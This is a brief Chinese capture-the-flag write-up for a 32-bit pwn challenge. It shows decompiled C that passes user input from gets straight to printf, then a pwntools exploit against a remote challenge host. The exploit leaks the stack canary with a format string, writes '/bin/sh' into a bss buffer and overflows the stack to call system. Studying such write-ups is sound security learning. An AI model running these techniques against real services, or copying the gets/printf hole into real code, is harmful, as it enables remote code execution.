fmt_text(格式化+canary绕过+栈溢出)

题目：

int __cdecl main(int argc, const char **argv, const char **envp)
{
  init();
  yichu();
  return 0;
}

unsigned int yichu()
{
  char s[100]; // [esp+8h] [ebp-70h] BYREF
  unsigned int v2; // [esp+6Ch] [ebp-Ch]

  v2 = __readgsdword(0x14u);
  gets(s);
  printf(s);
  gets(s);
  printf(s);
  return __readgsdword(0x14u) ^ v2;
}

思路：

先找出canary的值，再将/bin/sh放入位于bss段的buf，绕过canary，溢出调用system到buf执行/bin/sh

exp:

from pwn import *
from LibcSearcher import *
import base64
#context(arch="amd64")
#r = process("./pwn")
r = remote("1.95.36.136", 2061)
elf = ELF("./pwn")
buf = 0x804A080
payload = b'.%31$p'
print(len(fmtstr_payload(6,{buf:"/bin/sh"})))
#gdb.attach(r)
r.sendline(payload)
r.recvuntil(b'.')
canary = int(r.recv().decode(),16)
print("canary>>>",hex(canary))
system = 0x8048460
ret = 0x080483ee
payload = fmtstr_payload(6,{buf:"/bin/sh"})+b'a'*4+p32(canary)+b'a'*(4*3)+p32(system)+p32(0)+p32(buf)
#gdb.attach(r)
r.sendline(payload)
r.interactive()